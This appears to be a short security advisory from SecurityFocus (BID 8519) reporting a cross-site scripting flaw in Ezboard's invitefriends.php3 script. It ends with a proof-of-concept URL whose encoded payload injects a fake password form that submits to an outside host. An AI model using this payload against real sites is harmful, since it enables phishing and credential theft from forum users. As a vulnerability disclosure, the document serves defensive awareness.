8 lines
No EOL
938 B
Text
8 lines
No EOL
938 B
Text
source: https://www.securityfocus.com/bid/8519/info
|
|
|
|
The 'invitefriends.php3' script of Ezboard has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on user-supplied URI parameters. This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script.
|
|
|
|
It should be noted that it is currently unknown which versions of Ezboard are affected by this vulnerability. This bid will be updated as further information is made available.
|
|
|
|
http://www.example.com/invitefriends.php3?action=http://www.server.org&yourName=%22%3E%3Cp%3E%3Cb%3EYou%20must%20enter%20your%20password%20to%20invite%20a%20friend%3C/b%3E%3Cp%3E%3Cinput%20type=password%20name=pass%3E%3
|
|
Cp%3E%3Cb%3EEnter%20your%20friend%20address%3C/b%3E%3Cp%3E%3Cinput%20type=text%20name=mail%3E%3C/form%3E%3C!-- |